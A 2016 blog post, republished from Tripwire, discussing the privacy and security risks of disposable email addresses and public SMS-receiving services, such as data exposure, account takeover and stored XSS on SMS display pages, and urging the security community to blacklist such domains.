Monday, 1 February 2016

Temporary and Disposable Email: Anonymity, Privacy or Security?

There are several websites available that offer temporary and disposable email addresses, which have become quite popular among Internet users today, as they provide a quick alternative to anyone who wishes for their email address to remain private when sending and receiving emails. 
Some of these temporary and disposable email addresses are available only for a few minutes, while others remain publicly available for anyone to access once they have been created. The same goes for websites that offer access to publicly available mobile numbers for receiving text messages (SMS). There is a wide range of numbers available, from different countries.

Effectively, a user can register to an online service by using a publicly available mobile number and receive any verification texts online.

Some may argue that these temporary and disposable email addresses and SMS services provide some sort of privacy. That might be true, especially under specific circumstances, but do not confuse anonymity with privacy, and security.

Entering fake details while using a disposable email allows users to subscribe avoiding any future incoming communications from that particular website to their email or phone, but at what cost?

It is not possible to know who else is reading the outgoing and especially the incoming communication when using these services. Thus:
  • Any future communication that may contain sensitive data is going to be publicly available or it will be disclosed to unauthorised third-parties.
  • As it is not known who maintains or has access to these services and servers, it is theoretically possible to have the attachments intercepted and infected with malicious code in order to spread malware. The same goes for SMS messages that contain hyperlinks. For example, the links could be replaced automatically, pointing to a different address that has the original link embedded in an iframe.
  • The disposable emails, especially the ones with a life span only for a few minutes, have been used in the past for sending sensitive information, avoiding the use of a personal or corporate email.
  • Having access to the combination of a temporary email address and a mobile number may allow the takeover of a legitimate account by redirecting all communications to these disposable and publicly available accounts.
  • Due to the fact the SMS messages are displayed on the website exactly as they were received, it is possible to inject JavaScript code on these pages. In other words, all of these websites are vulnerable to cross-site scripting and, more specifically, to any stored XSS that can be written in 160 characters.
Google has already taken steps towards blacklisting these emails and phone numbers.

When trying to register a new email address with Google, the user is being asked for a secondary email address and a mobile number. It is not possible for a user to use any of these disposable email addresses and phone numbers when registering a new account.

Surprisingly enough, even though this is true for Google, it is not true for many other email providers out there. Even more surprising, though, is to see companies within the information security community to have not blacklisted these temporary and disposable email addresses when, for example, registering for a webinar or downloading a whitepaper.

Maintaining a list of these temporary and disposable email addresses it is not an easy task, especially when it comes to the publicly available mobile numbers for receiving text messages.

However, maintaining, contributing and sharing such a list among the information security community will further improve the existing email filtering mechanisms. The following URL is a list of all the domains currently being used as temporary and disposable email addresses:


Putting this list together was not easy but I really hope you find this list useful.
Let me know your thoughts in the comments section below or on Twitter (@drgfragkos).

This article was published by Tripwire and it is posted here for historical purposes. 

No comments:

Post a Comment